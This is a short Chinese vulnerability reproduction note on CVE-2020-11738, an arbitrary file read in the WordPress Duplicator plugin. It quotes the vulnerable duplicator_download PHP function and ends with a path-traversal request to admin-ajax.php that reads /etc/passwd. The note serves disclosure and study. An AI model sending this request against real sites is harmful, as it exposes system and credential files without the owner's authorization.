# WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738 ## 漏洞描述 WordPress Duplicator插件由于对文件下载没有进行验证,则导致了任意文件读取漏洞 ## 漏洞影响 ``` Duplicator <= v1.3.26 ``` ## 插件名 Duplicator https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip ## 漏洞复现 首先先查看注册的无需授权的action接口 `wp-content/plugins/duplicator/ctrls/class.web.services.php` ![](images/202205241332267.png) 这里 `wp_ajax_nopriv_duplicator_download` 对应的函数名为 duplicator_download ![](images/202205241332007.png) ``` public static function duplicator_download() { $file = sanitize_text_field($_GET['file']); $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file; // Process download if(file_exists($filepath)) { // Clean output buffer if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) { @ob_clean(); } header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($filepath).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filepath)); flush(); // Flush system output buffer try { $fp = @fopen($filepath, 'r'); if (false === $fp) { throw new Exception('Fail to open the file '.$filepath); } while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) { echo $data; } @fclose($fp); } catch (Exception $e) { readfile($filepath); } exit; } else { wp_die('Invalid installer file name!!'); } } ``` 可以看到这里接受参数 file,拼接至 $filepath 中,通过调试可以得知 DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录,file可控且没有过滤,导致任意文件读取 ``` /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd ``` ![](images/202205241334750.png)